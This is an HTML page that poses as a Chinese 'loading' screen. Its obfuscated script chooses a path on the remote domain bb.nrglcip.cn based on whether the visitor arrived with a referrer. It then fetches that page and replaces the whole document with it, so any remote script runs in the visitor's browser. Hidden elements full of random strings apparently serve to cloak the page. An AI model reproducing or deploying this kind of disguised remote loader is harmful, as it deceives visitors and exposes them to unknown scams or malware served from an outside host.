<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .AHlLeLn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .AHlLeLn .RFYOtp2V5 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .AHlLeLn .content {
            line-height: 50px;
            text-align: center
        }

        .AHlLeLn .img {
            width: 100%
        }

        .AHlLeLn .EPig5OdJn {
            text-align: center
        }

        .AHlLeLn .EPig5OdJn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .AHlLeLn .EPig5OdJn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .AHlLeLn .EPig5OdJn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .AHlLeLn .EPig5OdJn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .AHlLeLn .EPig5OdJn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .AHlLeLn .EPig5OdJn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .AHlLeLn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function BL4rWE9l5LjUl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var S6U5P0d = BL4rWE9l5LjUl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ S6U5P0d +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ S6U5P0d +".html?a=share";
		}
		
        f9hfh1lyy=url+"#"+new Date().getTime();
        f9hfh1lyy && function() {
            $.get(f9hfh1lyy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>t3c9SW585CO2nyKLv6drv4sOzpWdiXpcuhODyxObCH4Eh8lv5YJzIgLs3WGKLBX55lE7Iy3</span>
<p  style='display:none'>U6nyAVBfXpR56HrYejv8vG3K6uJX0mnsivydfxhorpt2qAxIkP0IJGXNraO3QSDq8N</p>
<p  style='display:none'>U6nyAVBfXpR56HrYejv8vG3K6uJX0mnsivydfxhorpt2qAxIkP0IJGXNraO3QSDq8N</p>
<li style='display:none' >TV2ZdQtXUylsMPgcPRu5Svfo6XH</li>
<b style='display:none' >mauuuNiojcxA10sCIeGlvVLKDeu</b>
<h1 style='display:none' >mvjuIadhCSWWW3CEwiq9OYCbT5tAGt7psEqqmAgY4Innc8y2pCZ1xT4JBiOBCQLbfIQ4VqTbV3Rfq6S3skX0i1pbuZHO</h1>
<span style='display:none'>t3c9SW585CO2nyKLv6drv4sOzpWdiXpcuhODyxObCH4Eh8lv5YJzIgLs3WGKLBX55lE7Iy3</span>
<p  style='display:none'>U6nyAVBfXpR56HrYejv8vG3K6uJX0mnsivydfxhorpt2qAxIkP0IJGXNraO3QSDq8N</p>
<div style='display:none'>rdHJzOnAEZBd4jT8eXTZe81nU9sEw2T95ac0zLLEcrPL5EAsHostzQfIA3nTezmre</div>
<span style='display:none'>t3c9SW585CO2nyKLv6drv4sOzpWdiXpcuhODyxObCH4Eh8lv5YJzIgLs3WGKLBX55lE7Iy3</span><div class="AHlLeLn">
    <div class="RFYOtp2V5">
        <div class="EPig5OdJn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>oEjuClTCvuvd2UWZzxHAJ8zJVAKj3JzlL9bDPNbvwoVFWIZwc6ijeYUmmT9ct9x3irTQpIVbSM3xTZJmUJ9DfhLt9WpIPyKeJ</span>
<h1 style='display:none' >xxr4g72WRsGHOf5F6MR8KLIsCZVC96qHidQfr1HuJ</h1>
<img  src='' style='display:none'>
<p  style='display:none'>N2DwoeWeHGKggLyEqqJTt8KFbh6QMtpSZcQTXLpcnHH</p></body>
</html>